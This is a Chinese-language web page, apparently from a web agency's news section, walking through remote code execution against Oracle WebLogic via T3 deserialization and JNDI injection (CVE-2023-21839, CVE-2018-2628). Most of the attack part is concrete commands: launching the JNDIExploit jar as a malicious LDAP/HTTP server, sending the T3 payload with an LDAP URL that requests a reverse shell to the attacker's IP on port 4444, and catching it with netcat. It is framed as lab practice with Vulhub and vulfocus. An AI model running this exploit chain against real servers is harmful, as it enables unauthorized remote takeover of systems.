ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

WebLogic 远程代码执行漏洞

WebLogic 远程代码执行漏洞 阶段关键工具/命令作用1. 攻击机启动服务java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.230.16启动恶意 LDAP 和 HTTP 服务器用于响应靶机的请求并传递恶意类。2. 发起攻击./cmd_linux_amd64 -ip 10.3.4.123 -ldap ldap://192.168.230.16:1389/...向靶机发送特制的 T3 协议数据触发漏洞去连接攻击机的 LDAP 服务器。3. 接收反弹 Shellnc -l 35460在攻击机上等待靶机执行恶意代码后主动连接回该端口从而获得目标服务器的控制权。️ 具体操作过程都是在攻击机上操作可以按照下图的流程来理解这个攻击链准备恶意服务在攻击机上运行JNDIExploit-1.4-SNAPSHOT.jar它会同时开启一个 LDAP 服务器和一个 HTTP 服务器。LDAP 服务器负责响应靶机的连接并告诉它去 HTTP 服务器下载一个恶意的 Java 类文件。java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.196.78触发漏洞攻击机执行cmd_linux_amd64工具或使用 Python 脚本它会向靶机的 端口 发送一个精心构造的 T3 协议数据包。由于靶机上的 WebLogic 存在反序列化漏洞它会解析这个恶意数据包并尝试连接攻击机的 LDAP 服务。./cmd_linux_amd64 -ip 10.3.4.117 -ldap ldap://192.168.196.78:1389/Basic/ReverseShell/192.168.196.78/4444执行恶意代码当靶机连接到恶意 LDAP 服务器后LDAP 服务器会返回一个引用地址引导靶机去下载并执行 HTTP 服务器上的恶意 Java 类。这个类会在靶机上执行预设的命令例如反弹 Shell并尝试连接回攻击机的 4444端口。监听获取控制权在攻击机上使用nc -l 4444开启监听等待靶机连接。当靶机成功执行恶意类并回连后攻击机就能获得一个交互式的 Shell意味着已经成功控制了靶机。nc -lvnp 4444⚠️ 核心原理补充T3 协议这是 WebLogic 特有的通信协议默认在 7001 端口开启用于客户端和服务器之间的数据传输。反序列化漏洞本质上是因为 WebLogic 在通过 T3 协议接收数据时没有对反序列化的内容进行严格过滤攻击者可以利用反序列化过程执行恶意代码。总结攻击 WebLogic 的过程简单说就是利用目标默认开启的T3协议漏洞在攻击机上架设一个“恶意仓库”诱导目标服务器访问并下载恶意代码最终获得服务器控制权。这条针对CVE-2023-21839或 CVE-2018-2628的完整路径主要利用JNDI 注入来实现远程代码执行。️ 攻击步骤核心拆解整个流程和你刚才操作的一致分为以下几步攻击流程主要操作技术原理1. 搭建恶意“仓库”在攻击机启动JNDIExploit开启 LDAP 和 HTTP 服务利用LDAP 服务来响应目标的请求引导它去指定的HTTP 服务下载恶意 Java 类2. 诱导目标访问向目标的7001端口发送 T3 协议数据包数据包触发目标程序进行JNDI Lookup远程查找导致目标主动连接攻击机3. 获取反弹 Shell在攻击机使用nc监听端口接收连接目标下载恶意代码并执行后会按预设指令主动回连到攻击机的监听端口 漏洞原理说明这两个漏洞的成因都源于 WebLogic 的T3 协议默认开放 7001 端口和Java 反序列化机制。反序列化机制WebLogic 为进行内部通信会处理来自网络的序列化数据。如果接收到的数据是不受信任的恶意构造就可能在服务器上触发意外的代码执行。JNDI 注入这是 CVE-2023-21839 的核心。攻击者通过漏洞让服务器去查找一个由攻击者控制的远程对象如通过 LDAP 协议。当服务器“查字典”找到这个恶意对象时就会去下载并运行攻击者准备好的恶意代码从而完成入侵。 适用攻击范围针对不同漏洞版本其影响范围有所不同CVE-2018-2628影响10.3.6.0、12.1.3.0、12.2.1.2、12.2.1.3等版本。CVE-2023-21839影响12.2.1.3.0、12.2.1.4.0、14.1.1.0.0等版本。由于该漏洞利用时不需要身份验证且能被网络访问利用其威胁等级被评定为7.5 (高危)。 推荐靶场练习你可以通过以下途径搭建环境进行练习本地 Docker 环境推荐下载Vulhub项目在对应目录下执行docker-compose up -d即可启动包含漏洞的 WebLogic 环境。在线靶场可以尝试 vulfocus.cn 或 buuoj.cn 等在线靶场平台通常会有预置好的 WebLogic 漏洞环境供直接练习。
返回列表